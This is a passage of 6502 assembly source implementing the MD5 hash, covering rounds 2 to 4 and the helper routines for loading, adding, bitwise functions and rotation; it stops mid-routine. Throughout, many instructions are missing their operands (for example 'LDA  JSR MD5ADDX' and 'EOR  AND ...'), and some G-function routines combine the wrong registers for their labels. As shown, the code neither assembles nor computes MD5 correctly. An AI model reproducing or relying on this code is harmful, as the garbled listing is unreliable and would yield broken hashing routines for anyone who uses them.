 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;19  (c,d,a,b)
 JSR G_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL14 ;Rotate left 14
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;20  (b,c,d,a)
 JSR G_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL20 ;Rotate left 20
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;21  (a,b,c,d)
 JSR G_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL5
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;22  (d,a,b,c)
 JSR G_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL9
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;23  (c,d,a,b)
 JSR G_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL14
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;24  (b,c,d,a)
 JSR G_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL20
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;25  (a,b,c,d)
 JSR G_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL5
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;26  (d,a,b,c)
 JSR G_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL9
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;27  (c,d,a,b)
 JSR G_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL14
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;28  (b,c,d,a)
 JSR G_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL20
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;29  (a,b,c,d)
 JSR G_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL5
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;30  (d,a,b,c)
 JSR G_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL9
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;31  (c,d,a,b)
 JSR G_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL14
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;32  (b,c,d,a)
 JSR G_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL20
 JSR MD5ADDC
 JSR MD5STORB
* Round 3 : H-functions
*          a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
 JSR MD5LOADA ;33  (a,b,c,d)
 JSR H_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL4 ;Rotate Left 4
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;34  (d,a,b,c)
 JSR H_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL11 ;Rotate Left 11
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;35  (c,d,a,b)
 JSR H_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL16 ;Rotate left 16
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;36  (b,c,d,a)
 JSR H_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL23 ;Rotate left 23
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;37  (a,b,c,d)
 JSR H_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL4
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;38  (d,a,b,c)
 JSR H_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL11
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;39  (c,d,a,b)
 JSR H_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL16
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;40  (b,c,d,a)
 JSR H_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL23
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;41  (a,b,c,d)
 JSR H_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL4
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;42  (d,a,b,c)
 JSR H_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL11
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;43  (c,d,a,b)
 JSR H_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL16
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;44  (b,c,d,a)
 JSR H_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL23
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;45  (a,b,c,d)
 JSR H_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL4
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;46  (d,a,b,c)
 JSR H_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL11
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;47  (c,d,a,b)
 JSR H_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL16
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;48  (b,c,d,a)
 JSR H_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL23
 JSR MD5ADDC
 JSR MD5STORB
* Round 4 : I-functions
*          a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
 JSR MD5LOADA ;49  (a,b,c,d)
 JSR I_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL6 ;Rotate Left 6
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;50  (d,a,b,c)
 JSR I_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL10 ;Rotate Left 10
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;51  (c,d,a,b)
 JSR I_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL15 ;Rotate left 15
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;52  (b,c,d,a)
 JSR I_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL21 ;Rotate left 21
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;53  (a,b,c,d)
 JSR I_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL6
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;54  (d,a,b,c)
 JSR I_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL10
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;55  (c,d,a,b)
 JSR I_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL15
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;56  (b,c,d,a)
 JSR I_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL21
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;57  (a,b,c,d)
 JSR I_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL6
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;58  (d,a,b,c)
 JSR I_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL10
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;59  (c,d,a,b)
 JSR I_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL15
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;60  (b,c,d,a)
 JSR I_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL21
 JSR MD5ADDC
 JSR MD5STORB
 JSR MD5LOADA ;61  (a,b,c,d)
 JSR I_BCD
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL6
 JSR MD5ADDB
 JSR MD5STORA
 JSR MD5LOADD ;62  (d,a,b,c)
 JSR I_ABC
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL10
 JSR MD5ADDA
 JSR MD5STORD
 JSR MD5LOADC ;63  (c,d,a,b)
 JSR I_DAB
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL15
 JSR MD5ADDD
 JSR MD5STORC
 JSR MD5LOADB ;64  (b,c,d,a)
 JSR I_CDA
 JSR NEXT_T
 LDA  JSR MD5ADDX
 JSR MD5RL21
 JSR MD5ADDC
 JSR MD5STORB
* Add value to previous digest.
* Note that this is four seperate 32-bit additions
 CLC
 LDA MD5TEMPB
 ADC DIGEST
 STA DIGEST
 LDA MD5TEMPB+1
 ADC DIGEST+1
 STA DIGEST+1
 LDA MD5TEMPB+2
 ADC DIGEST+2
 STA DIGEST+2
 LDA MD5TEMPB+3
 ADC DIGEST+3
 STA DIGEST+3
 CLC
 LDA MD5TEMPB+4
 ADC DIGEST+4
 STA DIGEST+4
 LDA MD5TEMPB+5
 ADC DIGEST+5
 STA DIGEST+5
 LDA MD5TEMPB+6
 ADC DIGEST+6
 STA DIGEST+6
 LDA MD5TEMPB+7
 ADC DIGEST+7
 STA DIGEST+7
 CLC
 LDA MD5TEMPB+8
 ADC DIGEST+8
 STA DIGEST+8
 LDA MD5TEMPB+9
 ADC DIGEST+9
 STA DIGEST+9
 LDA MD5TEMPB+10
 ADC DIGEST+10
 STA DIGEST+10
 LDA MD5TEMPB+11
 ADC DIGEST+11
 STA DIGEST+11
 CLC
 LDA MD5TEMPB+12
 ADC DIGEST+12
 STA DIGEST+12
 LDA MD5TEMPB+13
 ADC DIGEST+13
 STA DIGEST+13
 LDA MD5TEMPB+14
 ADC DIGEST+14
 STA DIGEST+14
 LDA MD5TEMPB+15
 ADC DIGEST+15
 STA DIGEST+15
 RTS
* Basic MD5 functions
MD5LOADA LDA MD5TEMPB ;Put 'A' into temp variable
 STA MD5TEMPV
 LDA MD5TEMPB+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 STA MD5TEMPV+3
 RTS
MD5LOADB LDA MD5TEMPB+4 ;Put 'B' into temp variable
 STA MD5TEMPV
 LDA MD5TEMPB+5
 STA MD5TEMPV+1
 LDA MD5TEMPB+6
 STA MD5TEMPV+2
 LDA MD5TEMPB+7
 STA MD5TEMPV+3
 RTS
MD5LOADC LDA MD5TEMPB+8 ;Put 'C' into temp variable
 STA MD5TEMPV
 LDA MD5TEMPB+9
 STA MD5TEMPV+1
 LDA MD5TEMPB+10
 STA MD5TEMPV+2
 LDA MD5TEMPB+11
 STA MD5TEMPV+3
 RTS
MD5LOADD LDA MD5TEMPB+12 ;Put 'D' into temp variable
 STA MD5TEMPV
 LDA MD5TEMPB+13
 STA MD5TEMPV+1
 LDA MD5TEMPB+14
 STA MD5TEMPV+2
 LDA MD5TEMPB+15
 STA MD5TEMPV+3
 RTS
MD5STORA LDA MD5TEMPV ;Store temp variable into 'A' in temp buffer
 STA MD5TEMPB
 LDA MD5TEMPV+1
 STA MD5TEMPB+1
 LDA MD5TEMPV+2
 STA MD5TEMPB+2
 LDA MD5TEMPV+3
 STA MD5TEMPB+3
 RTS
MD5STORB LDA MD5TEMPV ;Store temp variable into 'B'
 STA MD5TEMPB+4
 LDA MD5TEMPV+1
 STA MD5TEMPB+5
 LDA MD5TEMPV+2
 STA MD5TEMPB+6
 LDA MD5TEMPV+3
 STA MD5TEMPB+7
 RTS
MD5STORC LDA MD5TEMPV ;Store temp variable into 'C'
 STA MD5TEMPB+8
 LDA MD5TEMPV+1
 STA MD5TEMPB+9
 LDA MD5TEMPV+2
 STA MD5TEMPB+10
 LDA MD5TEMPV+3
 STA MD5TEMPB+11
 RTS
MD5STORD LDA MD5TEMPV ;Store temp variable into 'D'
 STA MD5TEMPB+12
 LDA MD5TEMPV+1
 STA MD5TEMPB+13
 LDA MD5TEMPV+2
 STA MD5TEMPB+14
 LDA MD5TEMPV+3
 STA MD5TEMPB+15
 RTS
MD5ADDA CLC ;Add 'A' to temp variable
 LDA MD5TEMPB
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
MD5ADDB CLC ;Add 'B' to temp variable
 LDA MD5TEMPB+4
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+5
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+6
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+7
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
MD5ADDC CLC ;Add 'C' to temp variable
 LDA MD5TEMPB+8
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+9
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+10
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+11
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
MD5ADDD CLC ;Add 'D' to temp variable
 LDA MD5TEMPB+12
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+13
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+14
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+15
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
* F function:
*          F(X,Y,Z) = XY v not(X) Z
F_BCD LDA MD5TEMPB+4 ;B&C
 AND MD5TEMPB+8
 STA MD5TEMP2
 LDA MD5TEMPB+5
 AND MD5TEMPB+9
 STA MD5TEMP2+1
 LDA MD5TEMPB+6
 AND MD5TEMPB+10
 STA MD5TEMP2+2
 LDA MD5TEMPB+7
 AND MD5TEMPB+11
 STA MD5TEMP2+3
 CLC ;not(B)&D or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+4
 EOR  AND MD5TEMPB+12
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+5 ;
 EOR  AND MD5TEMPB+13
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+6 ;
 EOR  AND MD5TEMPB+14
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+7 ;
 EOR  AND MD5TEMPB+15
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
F_ABC LDA MD5TEMPB ;A&B
 AND MD5TEMPB+4
 STA MD5TEMP2
 LDA MD5TEMPB+1
 AND MD5TEMPB+5
 STA MD5TEMP2+1
 LDA MD5TEMPB+2
 AND MD5TEMPB+6
 STA MD5TEMP2+2
 LDA MD5TEMPB+3
 AND MD5TEMPB+7
 STA MD5TEMP2+3
 CLC ;not(A)&C or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB
 EOR  AND MD5TEMPB+8
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1 ;
 EOR  AND MD5TEMPB+9
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2 ;
 EOR  AND MD5TEMPB+10
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3 ;
 EOR  AND MD5TEMPB+11
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
F_DAB LDA MD5TEMPB+12 ;D&A
 AND MD5TEMPB
 STA MD5TEMP2
 LDA MD5TEMPB+13
 AND MD5TEMPB+1
 STA MD5TEMP2+1
 LDA MD5TEMPB+14
 AND MD5TEMPB+2
 STA MD5TEMP2+2
 LDA MD5TEMPB+15
 AND MD5TEMPB+3
 STA MD5TEMP2+3
 CLC ;not(D)&B or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+12
 EOR  AND MD5TEMPB+4
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+13 ;
 EOR  AND MD5TEMPB+5
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+14 ;
 EOR  AND MD5TEMPB+6
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+15 ;
 EOR  AND MD5TEMPB+7
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
F_CDA LDA MD5TEMPB+8 ;C&D
 AND MD5TEMPB+12
 STA MD5TEMP2
 LDA MD5TEMPB+9
 AND MD5TEMPB+13
 STA MD5TEMP2+1
 LDA MD5TEMPB+10
 AND MD5TEMPB+14
 STA MD5TEMP2+2
 LDA MD5TEMPB+11
 AND MD5TEMPB+15
 STA MD5TEMP2+3
 CLC ;not(C)&A or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+8
 EOR  AND MD5TEMPB
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+9 ;
 EOR  AND MD5TEMPB+1
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+10 ;
 EOR  AND MD5TEMPB+2
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+11 ;
 EOR  AND MD5TEMPB+3
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
* G Function:
*          G(X,Y,Z) = XZ v Y not(Z)
G_BCD LDA MD5TEMPB+4 ;B&D
 AND MD5TEMPB+12
 STA MD5TEMP2
 LDA MD5TEMPB+5
 AND MD5TEMPB+13
 STA MD5TEMP2+1
 LDA MD5TEMPB+6
 AND MD5TEMPB+14
 STA MD5TEMP2+2
 LDA MD5TEMPB+7
 AND MD5TEMPB+15
 STA MD5TEMP2+3
 CLC ;not(D)&C or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+12
 EOR  AND MD5TEMPB+8
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+13 ;
 EOR  AND MD5TEMPB+9
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+14 ;
 EOR  AND MD5TEMPB+10
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+15 ;
 EOR  AND MD5TEMPB+11
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
G_ABC LDA MD5TEMPB ;A&C
 AND MD5TEMPB+8
 STA MD5TEMP2
 LDA MD5TEMPB+1
 AND MD5TEMPB+9
 STA MD5TEMP2+1
 LDA MD5TEMPB+2
 AND MD5TEMPB+10
 STA MD5TEMP2+2
 LDA MD5TEMPB+3
 AND MD5TEMPB+11
 STA MD5TEMP2+3
 CLC ;not(C)&B or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+8
 EOR  AND MD5TEMPB+4
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+9 ;
 EOR  AND MD5TEMPB+5
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+10 ;
 EOR  AND MD5TEMPB+6
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+11 ;
 EOR  AND MD5TEMPB+7
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
G_DAB LDA MD5TEMPB+4 ;B&D
 AND MD5TEMPB+12
 STA MD5TEMP2
 LDA MD5TEMPB+5
 AND MD5TEMPB+13
 STA MD5TEMP2+1
 LDA MD5TEMPB+6
 AND MD5TEMPB+14
 STA MD5TEMP2+2
 LDA MD5TEMPB+7
 AND MD5TEMPB+15
 STA MD5TEMP2+3
 CLC ;not(B)&A or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB+4
 EOR  AND MD5TEMPB
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+5 ;
 EOR  AND MD5TEMPB+1
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+6 ;
 EOR  AND MD5TEMPB+2
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+7 ;
 EOR  AND MD5TEMPB+3
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
G_CDA LDA MD5TEMPB ;C&A
 AND MD5TEMPB+8
 STA MD5TEMP2
 LDA MD5TEMPB+1
 AND MD5TEMPB+9
 STA MD5TEMP2+1
 LDA MD5TEMPB+2
 AND MD5TEMPB+10
 STA MD5TEMP2+2
 LDA MD5TEMPB+3
 AND MD5TEMPB+11
 STA MD5TEMP2+3
 CLC ;not(A)&D or (previous) -> MD5TEMPV+=
 LDA MD5TEMPB
 EOR  AND MD5TEMPB+12
 ORA MD5TEMP2
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1 ;
 EOR  AND MD5TEMPB+13
 ORA MD5TEMP2+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2 ;
 EOR  AND MD5TEMPB+14
 ORA MD5TEMP2+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3 ;
 EOR  AND MD5TEMPB+15
 ORA MD5TEMP2+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
* H function:
*          H(X,Y,Z) = X xor Y xor Z
H_BCD CLC ;BxCxD
 LDA MD5TEMPB+4
 EOR MD5TEMPB+8
 EOR MD5TEMPB+12
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+5
 EOR MD5TEMPB+9
 EOR MD5TEMPB+13
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+6
 EOR MD5TEMPB+10
 EOR MD5TEMPB+14
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+7
 EOR MD5TEMPB+11
 EOR MD5TEMPB+15
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
H_ABC CLC ;AxBxC
 LDA MD5TEMPB
 EOR MD5TEMPB+4
 EOR MD5TEMPB+8
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1
 EOR MD5TEMPB+5
 EOR MD5TEMPB+9
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 EOR MD5TEMPB+6
 EOR MD5TEMPB+10
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 EOR MD5TEMPB+7
 EOR MD5TEMPB+11
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
H_DAB CLC ;AxBxD
 LDA MD5TEMPB
 EOR MD5TEMPB+4
 EOR MD5TEMPB+12
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1
 EOR MD5TEMPB+5
 EOR MD5TEMPB+13
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 EOR MD5TEMPB+6
 EOR MD5TEMPB+14
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 EOR MD5TEMPB+7
 EOR MD5TEMPB+15
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
H_CDA CLC ;AxCxD
 LDA MD5TEMPB
 EOR MD5TEMPB+8
 EOR MD5TEMPB+12
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1
 EOR MD5TEMPB+9
 EOR MD5TEMPB+13
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 EOR MD5TEMPB+10
 EOR MD5TEMPB+14
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 EOR MD5TEMPB+11
 EOR MD5TEMPB+15
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
* I function
*          I(X,Y,Z) = Y xor (X v not(Z))
I_BCD CLC  ~D|B^C
 LDA MD5TEMPB+12
 EOR  ORA MD5TEMPB+4
 EOR MD5TEMPB+8
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+13
 EOR  ORA MD5TEMPB+5
 EOR MD5TEMPB+9
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+14
 EOR  ORA MD5TEMPB+6
 EOR MD5TEMPB+10
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+15
 EOR  ORA MD5TEMPB+7
 EOR MD5TEMPB+11
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
I_ABC CLC  ~C|A^B
 LDA MD5TEMPB+8
 EOR  ORA MD5TEMPB
 EOR MD5TEMPB+4
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+9
 EOR  ORA MD5TEMPB+1
 EOR MD5TEMPB+5
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+10
 EOR  ORA MD5TEMPB+2
 EOR MD5TEMPB+6
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+11
 EOR  ORA MD5TEMPB+3
 EOR MD5TEMPB+7
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
I_DAB CLC  ~B|D^A
 LDA MD5TEMPB+4
 EOR  ORA MD5TEMPB+12
 EOR MD5TEMPB
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+5
 EOR  ORA MD5TEMPB+13
 EOR MD5TEMPB+1
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+6
 EOR  ORA MD5TEMPB+14
 EOR MD5TEMPB+2
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+7
 EOR  ORA MD5TEMPB+15
 EOR MD5TEMPB+3
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
I_CDA CLC  ~A|C^D
 LDA MD5TEMPB
 EOR  ORA MD5TEMPB+8
 EOR MD5TEMPB+12
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5TEMPB+1
 EOR  ORA MD5TEMPB+9
 EOR MD5TEMPB+13
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
 LDA MD5TEMPB+2
 EOR  ORA MD5TEMPB+10
 EOR MD5TEMPB+14
 ADC MD5TEMPV+2
 STA MD5TEMPV+2
 LDA MD5TEMPB+3
 EOR  ORA MD5TEMPB+11
 EOR MD5TEMPB+15
 ADC MD5TEMPV+3
 STA MD5TEMPV+3
 RTS
*Rotate left functions
MD5RL LDA MD5TEMPV ;Rotate the 32-bit temp var left by one bit
 ASL
 STA MD5TEMPV
 LDA MD5TEMPV+1
 ROL
 STA MD5TEMPV+1
 LDA MD5TEMPV+2
 ROL
 STA MD5TEMPV+2
 LDA MD5TEMPV+3
 ROL
 STA MD5TEMPV+3
 LDA MD5TEMPV ;Take high bit and wrap around;
 ADC  ; add it to empty position in lowest byte
 STA MD5TEMPV
 RTS
* This is somewhat sloppy but it works
* It should be optimized to use full byte shifts when possible.
MD5RL7 LUP 7
 JSR MD5RL
 --^
 RTS
MD5RL12 LUP 12
 JSR MD5RL
 --^
 RTS
MD5RL17 LUP 17
 JSR MD5RL
 --^
 RTS
MD5RL22 LUP 22
 JSR MD5RL
 --^
 RTS
MD5RL5 LUP 5
 JSR MD5RL
 --^
 RTS
MD5RL9 LUP 9
 JSR MD5RL
 --^
 RTS
MD5RL14 LUP 14
 JSR MD5RL
 --^
 RTS
MD5RL20 LUP 20
 JSR MD5RL
 --^
 RTS
MD5RL4 LUP 4
 JSR MD5RL
 --^
 RTS
MD5RL11 LUP 11
 JSR MD5RL
 --^
 RTS
MD5RL16 LUP 16
 JSR MD5RL
 --^
 RTS
MD5RL23 LUP 23
 JSR MD5RL
 --^
 RTS
MD5RL6 LUP 6
 JSR MD5RL
 --^
 RTS
MD5RL10 LUP 10
 JSR MD5RL
 --^
 RTS
MD5RL15 LUP 15
 JSR MD5RL
 --^
 RTS
MD5RL21 LUP 21
 JSR MD5RL
 --^
 RTS
*Get data from input block and add it to temp variable
MD5ADDX ASL
 ASL
 CLC ;It better not be greater than 16 anyway!
 TAX
 LDA MD5BUFR,X
 ADC MD5TEMPV
 STA MD5TEMPV
 LDA MD5BUFR+1,X
 ADC MD5TEMPV+1
 STA MD5TEMPV+1
